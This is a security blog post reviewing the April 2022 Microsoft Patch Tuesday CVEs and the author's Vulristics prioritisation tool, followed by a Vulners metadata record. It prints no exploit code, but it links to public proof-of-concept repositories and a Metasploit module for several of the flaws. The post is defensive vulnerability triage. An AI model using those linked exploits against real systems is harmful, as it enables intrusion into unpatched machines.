Microsoft Patch Tuesday April 2022 and custom CVE comments sources in Vulristics

2022-04-23T09:22:32

Description

Hello everyone! This episode will be about Microsoft Patch Tuesday for April 2022 and new improvements in my [Vulristics](<https://github.com/leonov-av/vulristics>) project. I decided to add more comment sources. Because it's not just Tenable, Qualys, Rapid7 and ZDI make Microsoft Patch Tuesday reviews, but also other security companies and bloggers. Alternative video link (for Russia): <https://vk.com/video-149273431_456239085> You can see them in my automated security news telegram channel [avleonovnews](<https://t.me/avleonovnews>) after every second Tuesday of the month. So, now you can add any links with CVE comments to Vulristics. For April Patch Tuesday I will add these sources: * [Kaspersky](<https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/>) * [KrebsOnSecurity](<https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/>) * [ComputerWeekly](<https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs>) * [TheHackersNews](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>) * [Threatpost](<https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/>) Let's see if they highlight different sets of vulnerabilities. $ cat comments_links.txt Qualys|April 2022 Patch Tuesday: Microsoft Releases 145 Vulnerabilities with 10 Critical; Adobe Releases 4 Advisories, 78 Vulnerabilities with 51 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday ZDI|THE APRIL 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review Kaspersky|A bunch of vulnerabilities in Windows, one already exploited|https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/ KrebsOnSecurity|Microsoft Patch Tuesday, April 2022 Edition|https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/ ComputerWeekly|Microsoft patches two zero-days, 10 critical bugs|https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs TheHackersNews|Microsoft Issues Patches for 2 Windows Zero-Days and 126 Other Vulnerabilities|https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html Threatpost|Microsoft Zero-Days, Wormable Bugs Spark Concern|https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/ I have also added links to [Qualys](<https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday>) and [ZDI](<https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review>) blogposts. Qualys didn't fix their blog search (apparently no one uses it). ZDI don't have a blog search, and duckduckgo stopped indexing them properly. In addition, Tenable closed access to their [tenable.com](<http://tenable.com>). This is rather ironic considering that [Russian Tenable Security Day](<https://tenable-day.tiger-optics.ru/>) took place on February 10, 2022, just two months ago. [I participated in it](<https://www.youtube.com/watch?v=V5T3ftcFwdY>). It was a formal event with [Tenable's EMEA CTO and Regional Manager](<https://t.me/avleonovcom/961>). And now we are not talking about any support, updates and licenses for Russian companies and individuals, but even about access to the Tenable website. This is how the situation can change rapidly, if you trust Western vendors. Try not to do this. But in any case, you can still use the Tenable blog as a source of comments about Patch Tuesday vulnerabilities. I have added socks proxy support to Vulristics. vulners_key = "SFKJKEWRID2JFIJ...AAK3DHKSJD" proxies = { 'http': "socks5://<host>:<port>", 'https': "socks5://<host>:<port>" } I run the command like this: $ python3.8 vulristics.py --report-type "ms_patch_tuesday_extended" --mspt-year 2022 --mspt-month "April" --mspt-comments-links-path "comments_links.txt" --rewrite-flag "True" Just like last month, I'm taking into account not only the vulnerabilities published on April 11 (117 CVEs), but also all the vulnerabilities since last Patch Tuesday (40 CVEs). There are a total of 157 CVEs in the report. MS PT Year: 2022 MS PT Month: April MS PT Date: 2022-04-12 MS PT CVEs found: 117 Ext MS PT Date from: 2022-03-09 Ext MS PT Date to: 2022-04-11 Ext MS PT CVEs found: 40 ALL MS PT CVEs: 157 * Critical: 5 * High: 51 * Medium: 91 * Low: 10 Let's start with the critical ones: * **Elevation of Privilege** - Windows Common Log File System Driver ([CVE-2022-24521](<https://vulners.com/cve/CVE-2022-24521>)). Exploitation in the wild is mentioned in AttackerKB and Microsoft. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Functional Exploit). Since this vulnerability only allows a privilege escalation, it is likely paired with a separate code execution bug. This vulnerability was reported by the US National Security Agency. * **Remote Code Execution** - Remote Procedure Call Runtime ([CVE-2022-26809](<https://vulners.com/cve/CVE-2022-26809>)). An unauthenticated, remote attacker could exploit this vulnerability by sending “a specially crafted RPC call to an RPC host.” The vulnerability could allow a remote attacker to execute code at high privileges on an affected system. Since no user interaction is required, these factors combine to make this wormable, at least between machine where RPC can be reached. A proof of concept of this vulnerability [is available on giithub](<https://github.com/XmasSnow1/cve-2022-26809>). Other RCEs in RPC ([CVE-2022-24492](<https://vulners.com/cve/CVE-2022-24492>), [CVE-2022-24528](<https://vulners.com/cve/CVE-2022-24528>)) were also classified as Critical, but this is due to misattribution of exploits. The only exploitable is [CVE-2022-26809](<https://vulners.com/githubexploit/706a6eeb-1d07-53eb-8455-f7809863dadc>). * ****Remote Code Execution**** - Microsoft Edge ([CVE-2022-1096](<https://vulners.com/cve/CVE-2022-1096>)). In Vulristics report it was detected as **Unknown Vulnerability Type** because it's impossible to detect vulnerability type by description. "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information. Google is aware that an exploit for CVE-2022-1096 exists in the wild." In fact it is a well-known 0day RCE in Chrome, that affected all other Chromium-based browsers. Exploitation in the wild is mentioned in AttackerKB. The Vulristics report states that "Public exploit is found at Vulners". However, it's just a "Powershell script that dumps Chrome and Edge version to a text file in order to determine if you need to update due to CVE-2022-1096". Yes, it is difficult to determine what exactly was uploaded on github. Now let's see the most interesting vulnerabilities with the High level. * **Elevation of Privilege** - Windows User Profile Service ([CVE-2022-26904](<https://vulners.com/cve/CVE-2022-26904>)). This vulnerability supposed to have been fixed in the August 2021 update, when it was tracked as CVE-2021-34484. However, the researcher who discovered it later discovered a bypass, and then when that was fixed again in January, he went and bypassed it a second time. Not only is PoC out there for it, there’s a [Metasploit module](<https://vulners.com/metasploit/msf:exploit/windows/local/cve_2022_26904_superprofile/>) as well. This privilege escalation vulnerability allows an attacker to gain code execution at SYSTEM level on affected systems. The vulnerability relies on winning a race condition, which can be tricky to reliably achieve. * **Information Disclosure** - Windows Kernel ([CVE-2022-24483](<https://vulners.com/cve/CVE-2022-24483>)). Little is known about this vulnerability and no one has highlighted this vulnerability, but there is a [PoC for it on github](<https://github.com/waleedassar/CVE-2022-24483>). * **Remote Code Execution** - Windows DNS Server ([CVE-2022-26812](<https://vulners.com/cve/CVE-2022-26812>), [CVE-2022-26814](<https://vulners.com/cve/CVE-2022-26814>), [CVE-2022-26829](<https://vulners.com/cve/CVE-2022-26829>)). Also, no one highlighted this vulnerability. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Proof-of-Concept Exploit). There were 18(!) DNS Server bugs receiving patches this month. For the remaining vulnerabilities, there is neither a sign of exploitation in the wild, nor a sign of a public exploit. Let's see the most interesting ones. * **Remote Code Execution** - Windows SMB ([CVE-2022-24500](<https://vulners.com/cve/CVE-2022-24500>)). This vulnerability requires that a user with an affected version of Windows access a malicious server. An attacker would have to host a specially crafted server share or website. Exploitability Assessment: Exploitation Less Likely. **Remote Code Execution** - Windows Kernel ([CVE-2022-24541](<https://vulners.com/cve/CVE-2022-24541>)) is actually a similar SMB vulnerability as well. * **Remote Code Execution** - Windows Network File System ([CVE-2022-24491](<https://vulners.com/cve/CVE-2022-24491>), [CVE-2022-24497](<https://vulners.com/cve/CVE-2022-24497>)). An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution. NOTE: This vulnerability is only exploitable for systems that have the NFS role enabled. Exploitability Assessment: Exploitation More Likely. As you can see, additional sources of comments actually repeat everything that ZDI, Qualys, Rapid7 and Tenable highlight, but sometimes they add interesting details about vulnerabilities. The full report is available: [ms_patch_tuesday_april2022_report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2022_report_with_comments_ext_img.html>)

{"id": "AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692", "vendorId": null, "type": "avleonov", "bulletinFamily": "blog", "title": "Microsoft Patch Tuesday April 2022 and custom CVE comments sources in Vulristics", "description": "Hello everyone! This episode will be about Microsoft Patch Tuesday for April 2022 and new improvements in my [Vulristics](<https://github.com/leonov-av/vulristics>) project. I decided to add more comment sources. Because it's not just Tenable, Qualys, Rapid7 and ZDI make Microsoft Patch Tuesday reviews, but also other security companies and bloggers. \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239085>\n\nYou can see them in my automated security news telegram channel [avleonovnews](<https://t.me/avleonovnews>) after every second Tuesday of the month. So, now you can add any links with CVE comments to Vulristics.\n\nFor April Patch Tuesday I will add these sources:\n\n * [Kaspersky](<https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/>)\n * [KrebsOnSecurity](<https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/>)\n * [ComputerWeekly](<https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs>)\n * [TheHackersNews](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>)\n * [Threatpost](<https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/>)\n\nLet's see if they highlight different sets of vulnerabilities.\n \n \n $ cat comments_links.txt\n Qualys|April 2022 Patch Tuesday: Microsoft Releases 145 Vulnerabilities with 10 Critical; Adobe Releases 4 Advisories, 78 Vulnerabilities with 51 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday\n ZDI|THE APRIL 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review\n Kaspersky|A bunch of vulnerabilities in Windows, one already exploited|https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/\n KrebsOnSecurity|Microsoft Patch Tuesday, April 2022 Edition|https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/\n ComputerWeekly|Microsoft patches two zero-days, 10 critical bugs|https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs\n TheHackersNews|Microsoft Issues Patches for 2 Windows Zero-Days and 126 Other Vulnerabilities|https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html\n Threatpost|Microsoft Zero-Days, Wormable Bugs Spark Concern|https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/\n\nI have also added links to [Qualys](<https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday>) and [ZDI](<https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review>) blogposts. Qualys didn't fix their blog search (apparently no one uses it). ZDI don't have a blog search, and duckduckgo stopped indexing them properly. \n\nIn addition, Tenable closed access to their [tenable.com](<http://tenable.com>). This is rather ironic considering that [Russian Tenable Security Day](<https://tenable-day.tiger-optics.ru/>) took place on February 10, 2022, just two months ago. [I participated in it](<https://www.youtube.com/watch?v=V5T3ftcFwdY>). It was a formal event with [Tenable's EMEA CTO and Regional Manager](<https://t.me/avleonovcom/961>). And now we are not talking about any support, updates and licenses for Russian companies and individuals, but even about access to the Tenable website. This is how the situation can change rapidly, if you trust Western vendors. Try not to do this.\n\nBut in any case, you can still use the Tenable blog as a source of comments about Patch Tuesday vulnerabilities. I have added socks proxy support to Vulristics.\n \n \n vulners_key = \"SFKJKEWRID2JFIJ...AAK3DHKSJD\"\n proxies = {\n 'http': \"socks5://<host>:<port>\",\n 'https': \"socks5://<host>:<port>\"\n }\n\nI run the command like this:\n \n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"April\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n\nJust like last month, I'm taking into account not only the vulnerabilities published on April 11 (117 CVEs), but also all the vulnerabilities since last Patch Tuesday (40 CVEs). There are a total of 157 CVEs in the report.\n \n \n MS PT Year: 2022\n MS PT Month: April\n MS PT Date: 2022-04-12\n MS PT CVEs found: 117\n Ext MS PT Date from: 2022-03-09\n Ext MS PT Date to: 2022-04-11\n Ext MS PT CVEs found: 40\n ALL MS PT CVEs: 157\n\n * Critical: 5\n * High: 51\n * Medium: 91\n * Low: 10\n\nLet's start with the critical ones:\n\n * **Elevation of Privilege** - Windows Common Log File System Driver ([CVE-2022-24521](<https://vulners.com/cve/CVE-2022-24521>)). Exploitation in the wild is mentioned in AttackerKB and Microsoft. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Functional Exploit). Since this vulnerability only allows a privilege escalation, it is likely paired with a separate code execution bug. This vulnerability was reported by the US National Security Agency.\n * **Remote Code Execution** - Remote Procedure Call Runtime ([CVE-2022-26809](<https://vulners.com/cve/CVE-2022-26809>)). An unauthenticated, remote attacker could exploit this vulnerability by sending \u201ca specially crafted RPC call to an RPC host.\u201d The vulnerability could allow a remote attacker to execute code at high privileges on an affected system. Since no user interaction is required, these factors combine to make this wormable, at least between machine where RPC can be reached. A proof of concept of this vulnerability [is available on giithub](<https://github.com/XmasSnow1/cve-2022-26809>). Other RCEs in RPC ([CVE-2022-24492](<https://vulners.com/cve/CVE-2022-24492>), [CVE-2022-24528](<https://vulners.com/cve/CVE-2022-24528>)) were also classified as Critical, but this is due to misattribution of exploits. The only exploitable is [CVE-2022-26809](<https://vulners.com/githubexploit/706a6eeb-1d07-53eb-8455-f7809863dadc>). \n * ****Remote Code Execution**** - Microsoft Edge ([CVE-2022-1096](<https://vulners.com/cve/CVE-2022-1096>)). In Vulristics report it was detected as **Unknown Vulnerability Type** because it's impossible to detect vulnerability type by description. "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information. Google is aware that an exploit for CVE-2022-1096 exists in the wild." In fact it is a well-known 0day RCE in Chrome, that affected all other Chromium-based browsers. Exploitation in the wild is mentioned in AttackerKB. The Vulristics report states that "Public exploit is found at Vulners". However, it's just a "Powershell script that dumps Chrome and Edge version to a text file in order to determine if you need to update due to CVE-2022-1096". Yes, it is difficult to determine what exactly was uploaded on github.\n\nNow let's see the most interesting vulnerabilities with the High level.\n\n * **Elevation of Privilege** - Windows User Profile Service ([CVE-2022-26904](<https://vulners.com/cve/CVE-2022-26904>)). This vulnerability supposed to have been fixed in the August 2021 update, when it was tracked as CVE-2021-34484. However, the researcher who discovered it later discovered a bypass, and then when that was fixed again in January, he went and bypassed it a second time. Not only is PoC out there for it, there\u2019s a [Metasploit module](<https://vulners.com/metasploit/msf:exploit/windows/local/cve_2022_26904_superprofile/>) as well. This privilege escalation vulnerability allows an attacker to gain code execution at SYSTEM level on affected systems. The vulnerability relies on winning a race condition, which can be tricky to reliably achieve.\n * **Information Disclosure** - Windows Kernel ([CVE-2022-24483](<https://vulners.com/cve/CVE-2022-24483>)). Little is known about this vulnerability and no one has highlighted this vulnerability, but there is a [PoC for it on github](<https://github.com/waleedassar/CVE-2022-24483>).\n * **Remote Code Execution** - Windows DNS Server ([CVE-2022-26812](<https://vulners.com/cve/CVE-2022-26812>), [CVE-2022-26814](<https://vulners.com/cve/CVE-2022-26814>), [CVE-2022-26829](<https://vulners.com/cve/CVE-2022-26829>)). Also, no one highlighted this vulnerability. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Proof-of-Concept Exploit). There were 18(!) DNS Server bugs receiving patches this month.\n\nFor the remaining vulnerabilities, there is neither a sign of exploitation in the wild, nor a sign of a public exploit. Let's see the most interesting ones.\n\n * **Remote Code Execution** - Windows SMB ([CVE-2022-24500](<https://vulners.com/cve/CVE-2022-24500>)). This vulnerability requires that a user with an affected version of Windows access a malicious server. An attacker would have to host a specially crafted server share or website. Exploitability Assessment: Exploitation Less Likely. **Remote Code Execution** - Windows Kernel ([CVE-2022-24541](<https://vulners.com/cve/CVE-2022-24541>)) is actually a similar SMB vulnerability as well.\n * **Remote Code Execution** - Windows Network File System ([CVE-2022-24491](<https://vulners.com/cve/CVE-2022-24491>), [CVE-2022-24497](<https://vulners.com/cve/CVE-2022-24497>)). An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution. NOTE: This vulnerability is only exploitable for systems that have the NFS role enabled. Exploitability Assessment: Exploitation More Likely.\n\nAs you can see, additional sources of comments actually repeat everything that ZDI, Qualys, Rapid7 and Tenable highlight, but sometimes they add interesting details about vulnerabilities.\n\nThe full report is available: [ms_patch_tuesday_april2022_report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2022_report_with_comments_ext_img.html>)", "published": "2022-04-23T09:22:32", "modified": "2022-04-23T09:22:32", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://avleonov.com/2022/04/23/microsoft-patch-tuesday-april-2022-and-custom-cve-comments-sources-in-vulristics/", "reporter": "Alexander Leonov", "references": [], "cvelist": ["CVE-2021-34484", "CVE-2022-1096", "CVE-2022-24483", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24528", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26812", "CVE-2022-26814", "CVE-2022-26829", "CVE-2022-26904"], "immutableFields": [], "lastseen": "2022-04-23T12:23:39", "viewCount": 99, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:A37E08A92B8D58375143A320413C6011"]}, {"type": "attackerkb", "idList": ["AKB:157B4991-86A2-4A89-BD44-780E51F9FB80", "AKB:2A1BFBBE-FD48-497E-8F3E-BB65670A94FA", "AKB:5ABBD3E2-AA30-41CB-96DA-34B5E76D030C", "AKB:6D883363-6A9C-411A-8D48-5872842B65D3", "AKB:C32E9872-B8A4-43F3-A8CC-05532AA65E51"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2022-0101", "CPAI-2022-0192", "CPAI-2022-0195", "CPAI-2022-0202"]}, {"type": "chrome", "idList": ["GCSA-6591445864469691028"]}, {"type": "cisa", "idList": ["CISA:A4C48C3DF384DD6E6CE086DAF7BAE679"]}, {"type": "cve", "idList": ["CVE-2021-34484", "CVE-2022-1096", "CVE-2022-24481", "CVE-2022-24483", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24528", "CVE-2022-24536", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829", "CVE-2022-26904"]}, {"type": "debian", "idList": ["DEBIAN:DSA-5110-1:CD232"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2022-1096"]}, {"type": "fedora", "idList": ["FEDORA:0BF68306D452", "FEDORA:25D31307CC0A", "FEDORA:E6CD0309D335"]}, {"type": "freebsd", "idList": ["323F900D-AC6D-11EC-A0B8-3065EC8FD3EC"]}, {"type": "github", "idList": ["GITHUB:D9472F716C46C02F88677DBAD0EEA334"]}, {"type": "githubexploit", "idList": ["0324AD5C-F2E9-597E-A085-6035280E8508", "07076E26-7013-5B65-9FA9-CB53E0968E48", "0AA1EF4C-0788-53B4-B8B7-BE7502CC290D", "0FD9136A-3E4D-5411-B250-50BFE6958C1B", "11042BCC-1F42-5B57-B4AE-C5167CE829D6", "17D73993-DDAF-58B2-9041-7D2FF7F49F48", "18B2B79F-C680-583E-8CD2-F27E10E7C736", "23528F1E-CDCF-55BF-BE95-F887FF5EB2A6", "242E006E-772E-5E86-9F48-B134D7624197", "2A45AC5C-3583-5B97-96FD-54EDC121AE8B", "35A3A9CB-BAAD-5901-9147-926EDBCDC9D3", "4B9DFC33-3AD9-54F2-9409-61D1920B8A27", "5E3C3527-A8AB-573F-B617-ACCD672ED2FB", "63FE351E-F353-5ECF-A2FF-E425A0A9E6AB", "6639E3A7-8544-588C-80A6-A9CC4D11C0D8", "66FEAB51-0E93-5AFA-B90D-3B8FA04B402E", "69096CC9-9889-522F-9A0F-043629E15B77", "6D97B250-96C0-5F04-AB74-361E54407E64", "7030A9DA-EAD0-589C-BA80-9DF1BBF37F0A", "706A6EEB-1D07-53EB-8455-F7809863DADC", "7DD6705D-7B96-56E9-8ADE-4684010F1A61", "7E9D2224-5410-5B9B-902F-2292B3099682", "94F56A76-5FFA-517A-AD3C-93153FCA4D3E", "BB752603-5F3B-53D9-9580-9414AC4CDEF4", "D2BD2CCB-A50C-50C6-B8BB-ED7CEA7D850F", "D424D6C6-13F7-5CAE-8771-9103296520B9", "E872ADEA-727B-5F6F-A079-7258B7710EEB", "EE079BE6-0575-5AD9-9097-B2B35F50BC5A", "F06CBF2F-FED2-572B-B789-BDBB772E59E0"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA"]}, {"type": "hivepro", "idList": ["HIVEPRO:98B56CB60C0C2B248824B5ECAE47E387", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:F62D9BF485959B812585A48122216FD7", "HIVEPRO:F95B9B5A24C6987E85478A62BD37DD7D"]}, {"type": "ics", "idList": ["ICSA-22-209-01"]}, {"type": "kaspersky", "idList": ["KLA12250", "KLA12259", "KLA12492", "KLA12502", "KLA12503", "KLA12509", "KLA12529"]}, {"type": "krebs", "idList": ["KREBS:4BE9D01404C10748F3DE7B41B5A18613"]}, {"type": "mageia", "idList": ["MGASA-2022-0118"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3203C761121FB47FC676CC2505B4A9FD", "MALWAREBYTES:EF0C1E45728B8347B58DBE1D76A5F156"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_26904_SUPERPROFILE-"]}, {"type": "mscve", "idList": ["MS:CVE-2021-34484", "MS:CVE-2022-1096", "MS:CVE-2022-24481", "MS:CVE-2022-24483", "MS:CVE-2022-24491", "MS:CVE-2022-24492", "MS:CVE-2022-24497", "MS:CVE-2022-24500", "MS:CVE-2022-24521", "MS:CVE-2022-24528", "MS:CVE-2022-24536", "MS:CVE-2022-24541", "MS:CVE-2022-26809", "MS:CVE-2022-26811", "MS:CVE-2022-26812", "MS:CVE-2022-26813", "MS:CVE-2022-26814", "MS:CVE-2022-26815", "MS:CVE-2022-26817", "MS:CVE-2022-26818", "MS:CVE-2022-26819", "MS:CVE-2022-26820", "MS:CVE-2022-26821", "MS:CVE-2022-26822", "MS:CVE-2022-26823", "MS:CVE-2022-26824", "MS:CVE-2022-26825", "MS:CVE-2022-26826", "MS:CVE-2022-26829", "MS:CVE-2022-26904"]}, {"type": "nessus", "idList": ["701396.PASL", "DEBIAN_DSA-5110.NASL", "FREEBSD_PKG_323F900DAC6D11ECA0B83065EC8FD3EC.NASL", "GOOGLE_CHROME_99_0_4844_84.NASL", "MACOSX_GOOGLE_CHROME_99_0_4844_84.NASL", "MICROSOFT_EDGE_CHROMIUM_99_0_1150_55.NASL", "SMB_NT_MS21_AUG_5005030.NASL", "SMB_NT_MS21_AUG_5005031.NASL", "SMB_NT_MS21_AUG_5005033.NASL", "SMB_NT_MS21_AUG_5005040.NASL", "SMB_NT_MS21_AUG_5005043.NASL", "SMB_NT_MS21_AUG_5005089.NASL", "SMB_NT_MS21_AUG_5005094.NASL", "SMB_NT_MS21_AUG_5005095.NASL", "SMB_NT_MS21_AUG_5005106.NASL", "SMB_NT_MS22_APR_5012591.NASL", "SMB_NT_MS22_APR_5012592.NASL", "SMB_NT_MS22_APR_5012596.NASL", "SMB_NT_MS22_APR_5012599.NASL", "SMB_NT_MS22_APR_5012604.NASL", "SMB_NT_MS22_APR_5012632.NASL", "SMB_NT_MS22_APR_5012639.NASL", "SMB_NT_MS22_APR_5012647.NASL", "SMB_NT_MS22_APR_5012649.NASL", "SMB_NT_MS22_APR_5012653.NASL", "SMB_NT_MS22_APR_5012666.NASL", "UBUNTU_USN-5350-1.NASL"]}, {"type": "osv", "idList": ["OSV:DSA-5110-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:167516"]}, {"type": "qt", "idList": ["QT:B64AD93E56170FC29816162A7B78DDBC"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950", "QUALYSBLOG:C3DA3EB171A3FE51549E5B118BC0C7BB"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:266ADCD22F7AAC05069D569EBF2FEBB9", "RAPID7BLOG:729B902E7836EDA19BEC4A8EF1C066CF", "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD", "RAPID7BLOG:FF690F32AA83905D50C2FF923E9DD339"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2022:0091-1", "OPENSUSE-SU-2022:0103-1", "OPENSUSE-SU-2022:0110-1"]}, {"type": "thn", "idList": ["THN:2A188AB3A1960F89715831B15A68311E", "THN:2E90A09BA23747C57B4B5C9ED7D13ED9", "THN:6F5BF10AC5A30E497851C9ADE15C774A", "THN:BABD510622DAA320F3F1F55EEDD7549A", "THN:E48AEFF468AB8445D91A32B6F5D7A770", "THN:EC6517AAC0BD5D8BBC4C4D32420CA903"]}, {"type": "threatpost", "idList": ["THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:53A062956C31459E2846CD4C959DFD49", "THREATPOST:84909E392F4171398A52202CCC4E215A", "THREATPOST:91A97EE2BD6933FEB9A07162BD4ED8B5", "THREATPOST:95B32358658F5FEFA1715F69C5D6051D", "THREATPOST:B7A9B20B1E9413BB675D8C2810F1365F", "THREATPOST:C4B358E42FF02B710BE90F363212C84F"]}, {"type": "ubuntu", "idList": ["USN-5350-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2022-1096"]}, {"type": "veracode", "idList": ["VERACODE:34866"]}, {"type": "zdi", "idList": ["ZDI-21-966"]}, {"type": "zdt", "idList": ["1337DAY-ID-37625"]}]}, "epss": [{"cve": "CVE-2021-34484", "epss": "0.001340000", "percentile": "0.468380000", "modified": "2023-03-19"}, {"cve": "CVE-2022-1096", "epss": "0.002560000", "percentile": "0.616780000", "modified": "2023-03-19"}, {"cve": "CVE-2022-24483", "epss": "0.000510000", "percentile": "0.175700000", "modified": "2023-03-19"}, {"cve": "CVE-2022-24491", "epss": "0.011360000", "percentile": "0.825280000", "modified": "2023-03-19"}, {"cve": "CVE-2022-24492", "epss": "0.028260000", "percentile": "0.890720000", "modified": "2023-03-19"}, {"cve": "CVE-2022-24497", "epss": "0.013340000", "percentile": "0.839700000", "modified": "2023-03-19"}, {"cve": "CVE-2022-24500", "epss": "0.028260000", "percentile": "0.890720000", "modified": "2023-03-19"}, {"cve": "CVE-2022-24521", "epss": "0.000430000", "percentile": "0.074140000", "modified": "2023-03-19"}, {"cve": "CVE-2022-24528", "epss": "0.028260000", "percentile": "0.890720000", "modified": "2023-03-19"}, {"cve": "CVE-2022-24541", "epss": "0.028260000", "percentile": "0.890720000", "modified": "2023-03-19"}, {"cve": "CVE-2022-26809", "epss": "0.425740000", "percentile": "0.967130000", "modified": "2023-03-19"}, {"cve": "CVE-2022-26812", "epss": "0.004310000", "percentile": "0.705170000", "modified": "2023-03-19"}, {"cve": "CVE-2022-26814", "epss": "0.002980000", "percentile": "0.646340000", "modified": "2023-03-19"}, {"cve": "CVE-2022-26829", "epss": "0.002980000", "percentile": "0.646340000", "modified": "2023-03-19"}, {"cve": "CVE-2022-26904", "epss": "0.001670000", "percentile": "0.517050000", "modified": "2023-03-19"}], "vulnersScore": -0.1}, "_state": {"score": 1684014194, "dependencies": 1659988328, "epss": 1679290575}, "_internal": {"score_hash": "ad3f5396896e258a4b3ff275c655cba4"}}

